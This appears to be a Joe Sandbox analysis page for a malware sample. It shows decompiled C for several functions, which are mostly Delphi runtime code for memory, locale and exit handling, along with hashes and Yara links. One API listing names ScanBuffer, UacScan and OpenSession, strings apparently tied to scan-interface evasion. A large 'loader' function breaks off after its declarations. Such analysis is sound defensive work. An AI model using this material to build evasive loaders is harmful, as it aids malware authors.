Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: 95a0b18580847d1ea9aeaf06e5887657d3fbf4c02c039ee9f54a5f1cae240e62
Instruction ID: d4d3c15471b318ed9ef2d206f04bbd768b89a352fb27b20eca12c8ef3091736f
Opcode Fuzzy Hash: 95a0b18580847d1ea9aeaf06e5887657d3fbf4c02c039ee9f54a5f1cae240e62
Instruction Fuzzy Hash: B1E06539624B08BFD701FBA5CC519DD76FCDF89790B620471E804E6611D9F59D408464

Uniqueness

Uniqueness Score: -1.00%

Function 032A582C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E032A582C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				CHAR* _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x32a0000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E032A5A90(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x32a0000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x32a0000
				return  *_t7;
			}

0x032a5834
0x032a583a
0x032a5846
0x032a584a
0x032a5853
0x032a5858
0x032a585a
0x032a585f
0x032a5861
0x032a5864
0x032a5864
0x032a585f
0x032a5867
0x032a5872

APIs

GetModuleFileNameA.KERNEL32(032A0000,?,00000105), ref: 032A584A

Part of subcall function 032A5A90: GetModuleFileNameA.KERNEL32(00000000,?,00000105,032A0000,032C9790), ref: 032A5AAC
Part of subcall function 032A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032A0000,032C9790), ref: 032A5ACA
Part of subcall function 032A5A90: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,032A0000,032C9790), ref: 032A5AE8
Part of subcall function 032A5A90: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 032A5B06
Part of subcall function 032A5A90: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,032A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 032A5B4F
Part of subcall function 032A5A90: RegQueryValueExA.ADVAPI32(?,032A5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,032A5B95,?,80000001), ref: 032A5B6D
Part of subcall function 032A5A90: RegCloseKey.ADVAPI32(?,032A5B9C,00000000,?,?,00000000,032A5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 032A5B8F

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
Instruction ID: e1bf60b205107d9a39988189bb2b7a21c02b42ee19d27a88a80b83962da08455
Opcode Fuzzy Hash: 36ac8199cd3100c6d0ea6747034283b2de4f4045689bdbb239c39140d976698a
Instruction Fuzzy Hash: 99E09271A107258FCB10DE5CD8C0A5733D8AF09754F0809A1EC94CF346D3B0D9A08BD0

Uniqueness

Uniqueness Score: -1.00%

Function 032A7E40 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E032A7E40(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E032A4964(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x032a7e4b
0x032a7e53
0x032a7e5c
0x032a7e5d
0x032a7e60
0x032a7e60

APIs

GetFileAttributesA.KERNEL32(00000000,033D2880,032BDEBB,ScanString,032C6AA0,ScanBuffer,032C6AA0,UacInitialize,032C6AA0,UacScan,032C6AA0,Initialize,032C6AA0,ScanBuffer,032C6AA0,OpenSession), ref: 032A7E4B

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
Instruction ID: 9523ce875715de4af1103eab2dfe3dd339892275ec1f6f52a33fdf4cd9a589cd
Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
Instruction Fuzzy Hash: 7DC08CA4635B060B1A50EAFC1DC416982C80945639B2C0E21E038DA3D1E2A5D8E22024

Uniqueness

Uniqueness Score: -1.00%

Function 032C74EC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E032C74EC(int __eax) {
				int _t3;

				_t3 = timeSetEvent(__eax, 0, E032C74E0, 0, 1); // executed
				 *0x33d2864 = _t3;
				return _t3;
			}

0x032c74fc
0x032c7501
0x032c7507

APIs

timeSetEvent.WINMM(00002710,00000000,032C74E0,00000000,00000001), ref: 032C74FC

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: 4c5072010b13ca60ffeb72c72144e4f237b4a64b6b73812271b1e81ec6b902f3
Instruction ID: 71264d6c09ff7933c609f390d31a650db1157554880d1ac62b0d98803a51d365
Opcode Fuzzy Hash: 4c5072010b13ca60ffeb72c72144e4f237b4a64b6b73812271b1e81ec6b902f3
Instruction Fuzzy Hash: 20C092F03A278C3FF630A6A92CC2F6B59DCD704B12F600415B614FE2E1D2E258904A64

Uniqueness

Uniqueness Score: -1.00%

Function 032A15CC Relevance: 1.3, APIs: 1, Instructions: 38
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E032A15CC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void* _t10;
				void** _t15;
				void* _t17;

				_t8 = __eax;
				E032A1560(__eax);
				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x32db720 = 0;
					return 0;
				} else {
					_t15 =  *0x32db70c; // 0x9200000
					_t10 = _t4;
					 *_t10 = 0x32db708;
					 *0x32db70c = _t4;
					 *(_t10 + 4) = _t15;
					 *_t15 = _t4;
					_t17 = _t4 + 0x140000;
					 *((intOrPtr*)(_t17 - 4)) = 2;
					 *0x32db720 = 0x13fff0 - _t8;
					_t7 = _t17 - _t8;
					 *0x32db71c = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x032a15cd
0x032a15cf
0x032a15e2
0x032a15e9
0x032a163a
0x032a1642
0x032a15eb
0x032a15eb
0x032a15f1
0x032a15f3
0x032a15f9
0x032a15fe
0x032a1601
0x032a1605
0x032a1610
0x032a161d
0x032a1625
0x032a1627
0x032a1634
0x032a1637
0x032a1637

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,032A1A03,?,032A1FC1), ref: 032A15E2

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2fc1762081afecc41a61eb59a9ba7982f52428b8f60e31f4197a016c227e5d1
Instruction ID: 556c1177a0e180337da8a15adc3aec4ce4b3d544e6434c65fbd89059a0d813bc
Opcode Fuzzy Hash: c2fc1762081afecc41a61eb59a9ba7982f52428b8f60e31f4197a016c227e5d1
Instruction Fuzzy Hash: 44F06DF1B123004FEB05EF79A9643117BE2E789344F25C17ED609DB388EB7194518B10

Uniqueness

Uniqueness Score: -1.00%

Function 032A1682 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E032A1682(intOrPtr __eax) {
				void* _t6;
				void** _t9;
				void* _t11;
				void* _t15;
				long _t20;
				intOrPtr _t24;

				_t24 = __eax;
				_t20 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
				_t6 = VirtualAlloc(0, _t20, 0x101000, 4); // executed
				_t11 = _t6;
				if(_t11 != 0) {
					_t15 = _t11;
					 *((intOrPtr*)(_t15 + 8)) = _t24;
					 *(_t15 + 0xc) = _t20 | 0x00000004;
					E032A1644();
					_t9 =  *0x32dd7b0; // 0x7f7f0000
					 *_t15 = 0x32dd7ac;
					 *0x32dd7b0 = _t11;
					 *(_t15 + 4) = _t9;
					 *_t9 = _t11;
					 *0x32dd7a8 = 0;
					_t11 = _t11 + 0x10;
				}
				return _t11;
			}

0x032a1688
0x032a1694
0x032a16a4
0x032a16a9
0x032a16ad
0x032a16af
0x032a16b1
0x032a16b7
0x032a16ba
0x032a16bf
0x032a16c4
0x032a16ca
0x032a16d0
0x032a16d3
0x032a16d5
0x032a16dc
0x032a16dc
0x032a16e5

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,032A1FC1), ref: 032A16A4

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 843e313bf3fb80211c42f254126cc5952b471296927a17e55b2309c618275314
Instruction ID: 272e31761e5b792963471d5e0ca2156c1db08e9f2fb13bdbd93e2e5fe55da226
Opcode Fuzzy Hash: 843e313bf3fb80211c42f254126cc5952b471296927a17e55b2309c618275314
Instruction Fuzzy Hash: 57F0BEB6A05F956BE710EF5EAC84B82BB94FF05720F054179FA089B344D7B0A8608794

Uniqueness

Uniqueness Score: -1.00%

Function 032A16E6 Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E032A16E6(void* __eax) {
				void* _t5;
				signed int _t6;
				signed int _t7;
				void* _t10;
				void* _t13;
				void _t16;

				_t10 = __eax - 0x10;
				E032A1644();
				_t5 = _t10;
				_t16 =  *_t5;
				_t13 =  *(_t5 + 4);
				_t6 = VirtualFree(_t10, 0, 0x8000); // executed
				if(_t6 == 0) {
					_t7 = _t6 | 0xffffffff;
				} else {
					 *_t13 = _t16;
					 *(_t16 + 4) = _t13;
					_t7 = 0;
				}
				 *0x32dd7a8 = 0;
				return _t7;
			}

0x032a16ed
0x032a16f0
0x032a16f5
0x032a16f7
0x032a16f9
0x032a1704
0x032a170b
0x032a1716
0x032a170d
0x032a170d
0x032a170f
0x032a1712
0x032a1712
0x032a1719
0x032a1723

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,032A1FE4), ref: 032A1704

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c7df66053e15946cb5e6e06ab97eb0ba996801989ebee110eac87e8e5041dcc7
Instruction ID: 831114ed3c861fdbecbcb330caa33ca6920ef6c7d8eb02be32034bfaca73a3b3
Opcode Fuzzy Hash: c7df66053e15946cb5e6e06ab97eb0ba996801989ebee110eac87e8e5041dcc7
Instruction Fuzzy Hash: 11E02C79320B01AFE710AA7E5D80B02ABC8EB88770F284076F201CB295C2B0F8648320

Uniqueness

Uniqueness Score: -1.00%

Function 032B75D8 Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E032B75D8(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t24;
				void* _t41;
				intOrPtr _t50;
				intOrPtr _t57;
				void* _t58;
				intOrPtr _t61;
				intOrPtr _t62;

				_t59 = __esi;
				_t58 = __edi;
				_t17 = __eax;
				_t61 = _t62;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_v8 = __ecx;
				_t41 = __edx;
				_push(_t61);
				_push(0x32b769d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t62;
				if(__eax != 0x80020009) {
					_t59 = E032B6BCC(__edx, 0, 1, __edi, __esi, __fp0, 0, __eax);
				} else {
					E032A4728( &_v12,  *((intOrPtr*)(__edx + 4)));
					E032A4728( &_v16,  *((intOrPtr*)(_t41 + 0xc)));
					E032A4728( &_v20,  *((intOrPtr*)(_t41 + 8)));
					_t59 = E032B6CA0(_t41, _v20, 1, __edi, __esi, __fp0,  *((intOrPtr*)(_t41 + 0x10)), _v16, _v12,  *((intOrPtr*)(__edx + 0x1c)));
					if(_a4 != 0) {
						_t57 =  *0x32acd60; // 0x32acd64
						E032A5100(_t41, _t57);
					}
				}
				if(_v8 != 0) {
					_push(_v8);
					_t17 = _t59;
					_t24 = _t17;
					if(_t24 == 0) {
						_t24 = E032A4494(0xd8);
					}
					_pop(_t52);
					_push(_t62);
					_push(_t61);
					_push(_t58);
					_push(_t59);
					_push(_t41);
					_push(_t24);
					_push(_t62);
					_push(7);
					_push(1);
					_push(0xeedfade);
					_push(_t52);
					goto ( *0x32db014);
				}
				L1(); // executed
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x32b76a4);
				return E032A44C4( &_v20, 3);
			}

0x032b75d8
0x032b75d8
0x032b75d8
0x032b75d9
0x032b75db
0x032b75dd
0x032b75df
0x032b75e1
0x032b75e3
0x032b75e4
0x032b75e5
0x032b75e8
0x032b75ec
0x032b75ed
0x032b75f2
0x032b75f5
0x032b75fd
0x032b7667
0x032b75ff
0x032b7609
0x032b7618
0x032b762b
0x032b763f
0x032b7645
0x032b7649
0x032b764f
0x032b764f
0x032b7645
0x032b766d
0x032b766f
0x032b7672
0x032a3e5c
0x032a3e5e
0x032a3e65
0x032a3e65
0x032a3e6a
0x032a3e6b
0x032a3e6c
0x032a3e6d
0x032a3e6e
0x032a3e6f
0x032a3e70
0x032a3e72
0x032a3e73
0x032a3e75
0x032a3e77
0x032a3e7c
0x032a3e7d
0x032a3e7d
0x032b767d
0x032b7684
0x032b7687
0x032b768a
0x032b769c

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 872851e71e1a05d9814ea5247382f49f83fea25620691fd23046791281d2b2a5
Instruction ID: 29f5473ebfd7eb0f81604b8d6e84c83d3b16593dde1c7012acc135e0be19c8b3
Opcode Fuzzy Hash: 872851e71e1a05d9814ea5247382f49f83fea25620691fd23046791281d2b2a5
Instruction Fuzzy Hash: 3C218C39720604AFDB05EE5CDD80F9EB7B9EB88740F5485A5E904AB344C6B0ED808B94

Uniqueness

Uniqueness Score: -1.00%

Function 032A415C Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E032A415C(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				void* _t27;
				char _t32;
				signed int _t33;
				signed int _t34;
				int _t42;
				void* _t55;
				intOrPtr _t60;
				void _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t69;
				intOrPtr _t72;
				struct HINSTANCE__* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t91;
				void* _t92;

				_t72 = __edx;
				_t60 = __ebx;
				_t27 = memcpy(_t89 - 0x3c, 0x32dd7c8, 0xb << 2);
				_t92 = _t91 + 0xc;
				_pop( *0x32dd7e8);
				_pop( *0x32dd7e4);
				 *0x32dd7dc = _t89;
				 *0x32dd7e0 = __ebx;
				 *0x32dd7d0 = _t27;
				 *0x32dd7d8 = _t72;
				 *0x32dd7c8 = _t89 - 0x3c;
				_t66 = 0;
				if( *(_t89 + 0xc) == 0) {
					_t66 =  *_t27;
				}
				 *0x32dd7d4 = _t66;
				 *0x32db014 = 0x32a1178;
				 *0x32db018 = 0x32a1180;
				E032A4048();
				_t32 =  *(_t89 + 0xc) + 1;
				 *0x32dd7f0 = _t32;
				_t33 = _t32 - 1;
				_pop(_t67);
				 *0x32dd7ec =  *_t67;
				if(_t33 != 0 && _t33 < 3) {
					 *((intOrPtr*)(_t67 + _t33 * 4))();
				}
				_push(_t67);
				_t68 =  *((intOrPtr*)(_t92 + 8));
				if(_t68 != 0) {
					 *_t68();
				}
				_pop(_t69);
				_t34 =  *(_t89 + 0xc);
				if(_t34 >= 3) {
					 *((intOrPtr*)(_t69 + _t34 * 4))();
				}
				if( *0x32db030 == 0) {
					 *0x32db038 = 1;
					asm("fnstcw word [0x32c9024]");
				}
				if( *(_t89 + 0xc) != 1) {
					_push(_t60);
					_push(0x32dd7c8);
					_push(0x32dd7de);
					_push(_t89);
					if( *0x032DD7F0 != 0 ||  *0x32db048 == 0) {
						L16:
						if( *0x32c9004 != 0) {
							E032A428C();
							E032A4320(_t69);
							 *0x32c9004 = 0;
						}
						L18:
						if( *((char*)(0x32dd7f0)) == 2 &&  *0x32c9000 == 0) {
							 *0x032DD7D4 = 0;
						}
						E032A4090();
						if( *((char*)(0x32dd7f0)) <= 1 ||  *0x32c9000 != 0) {
							_t80 =  *0x032DD7D8;
							if( *0x032DD7D8 != 0) {
								E032A5E00(_t80);
								_t90 =  *((intOrPtr*)(0x32dd7d8));
								_t21 = _t90 + 0x10; // 0x32a0000
								_t87 =  *_t21;
								_t22 = _t90 + 4; // 0x32a0000
								if(_t87 !=  *_t22 && _t87 != 0) {
									FreeLibrary(_t87);
								}
							}
						}
						E032A4068();
						if( *((char*)(0x32dd7f0)) == 1) {
							 *0x032DD7EC();
						}
						if( *((char*)(0x32dd7f0)) != 0) {
							E032A42F0();
						}
						if( *0x32dd7c8 == 0) {
							if( *0x32db028 != 0) {
								 *0x32db028();
							}
							_t42 =  *0x32c9000; // 0x0
							ExitProcess(_t42);
						}
						memcpy(0x32dd7c8,  *0x32dd7c8, 0xb << 2);
						_t92 = _t92 + 0xc;
						goto L18;
					} else {
						do {
							 *0x32db048 = 0;
							 *((intOrPtr*)( *0x32db048))();
						} while ( *0x32db048 != 0);
						goto L16;
					}
				} else {
					_t55 = E032A40F4(); // executed
					return _t55;
				}
			}

0x032a415c
0x032a415c
0x032a416c
0x032a416c
0x032a416e
0x032a4174
0x032a417a
0x032a4180
0x032a4186
0x032a418b
0x032a4194
0x032a419a
0x032a41a0
0x032a41a2
0x032a41a2
0x032a41a4
0x032a41af
0x032a41b9
0x032a41be
0x032a41c6
0x032a41c7
0x032a41cc
0x032a41cd
0x032a41d0
0x032a41d6
0x032a41dc
0x032a41dc
0x032a41df
0x032a41e0
0x032a41e6
0x032a41ee
0x032a41ee
0x032a41f0
0x032a41f1
0x032a41f6
0x032a41f8
0x032a41f8
0x032a4202
0x032a4204
0x032a420b
0x032a420b
0x032a4215
0x032a43ac
0x032a43ad
0x032a43ae
0x032a43af
0x032a43be
0x032a43d4
0x032a43db
0x032a43dd
0x032a43e2
0x032a43e9
0x032a43e9
0x032a43ee
0x032a43f2
0x032a43ff
0x032a43ff
0x032a4402
0x032a440b
0x032a4416
0x032a441b
0x032a441f
0x032a4424
0x032a4427
0x032a4427
0x032a442a
0x032a442d
0x032a4434
0x032a4434
0x032a442d
0x032a441b
0x032a4439
0x032a4442
0x032a4444
0x032a4444
0x032a444b
0x032a444d
0x032a444d
0x032a4455
0x032a445e
0x032a4460
0x032a4460
0x032a4466
0x032a446c
0x032a446c
0x032a447c
0x032a447c
0x00000000
0x032a43c5
0x032a43c5
0x032a43cb
0x032a43cd
0x032a43cf
0x00000000
0x032a43c5
0x032a421b
0x032a421b
0x032a4220
0x032a4220

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27781c5d62d4c00eec251c9ed42674cc38524c0366264ca0090e70d09debc3c5
Instruction ID: 352d0d27fc34e2ad8f3b448a33bd9dc11b968c9aa7139feb5530857053672fff
Opcode Fuzzy Hash: 27781c5d62d4c00eec251c9ed42674cc38524c0366264ca0090e70d09debc3c5
Instruction Fuzzy Hash: 55215978916A09CFEB08EF2EF4486997BE4FB59710F54C09EE8148B348C7B099A1CB50

Uniqueness

Uniqueness Score: -1.00%

Function 032A40F4 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f13b50d1ff209d06cb6615e13d2c0ee232585b3a884da9afd4fc9bf50d61263a
Instruction ID: b2836b269b896d9c79e6677e1172617cfbd468df582bdec62951fb02b2b200c2
Opcode Fuzzy Hash: f13b50d1ff209d06cb6615e13d2c0ee232585b3a884da9afd4fc9bf50d61263a
Instruction Fuzzy Hash: 8BF02B32715E069FA711DF4FE880819F7ECE759B1435640BAE504C7B10D6B1EC508650

Uniqueness

Uniqueness Score: -1.00%

Function 032C74E0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID: InetOffline
String ID:
API String ID: 3180263700-0
Opcode ID: bda40c73234dca3d881477a73093573e2fc81d7cefa59c78efb77cb5b2cee47e
Instruction ID: 164caeb4e4fc4a839f4b6a3900a6610cae76ac691a14600aad7e346b357f1177
Opcode Fuzzy Hash: bda40c73234dca3d881477a73093573e2fc81d7cefa59c78efb77cb5b2cee47e
Instruction Fuzzy Hash: 3590022605470C055040B6953441996725C055165158040325B0909622599664A160B9

Uniqueness

Uniqueness Score: -1.00%

Function 032B76AC Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243307396.00000000032A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true

Associated: 00000000.00000002.243301207.00000000032A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000032C9000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.243353180.00000000033D3000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_r096teIe1H.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02d93a51bacbce2091064767806e85865d688e3966ae3e7cfdbaa61f38ca5c6
Instruction ID: 8656e23072dce0dff486c0b55def709c46d507ef38842c9447be2fc64f536420
Opcode Fuzzy Hash: f02d93a51bacbce2091064767806e85865d688e3966ae3e7cfdbaa61f38ca5c6
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 032BA6F4 Relevance: 64.5, APIs: 16, Strings: 20, Instructions: 1543
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E032BA6F4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v5;
				void* _v12;
				short _v14;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				intOrPtr _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				char _v244;
				intOrPtr _v248;
				char _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				char _v348;
				char _v352;
				char _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
